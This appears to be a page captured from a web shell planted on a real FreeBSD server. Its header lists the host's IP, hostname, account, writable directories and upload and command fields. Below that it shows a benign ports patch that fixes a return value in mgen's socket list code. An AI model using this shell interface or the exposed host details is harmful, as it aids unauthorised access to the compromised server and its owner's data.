403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/mgen/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/mgen/files/patch-common_mgenSocketList.cpp
../common/mgenSocketList.cpp:231:20: error: cannot initialize return object of type 'MgenSocketList::Item *' with an rvalue of type 'bool'
            return false;
                   ^~~~~

--- common/mgenSocketList.cpp.orig	2018-08-25 18:45:33 UTC
+++ common/mgenSocketList.cpp
@@ -228,7 +228,7 @@ MgenSocketList::Item* MgenSocketList::JoinGroup(const 
         {
             DMSG(0, "MgenSocketList::JoinGroup() memory allocation error: %s\n",
                     GetErrorString());
-            return false;
+            return NULL;
         }
         item->SetSocketNotifier(socket_notifier);
         Prepend(item);

Youez - 2016 - github.com/yon3zu
LinuXploit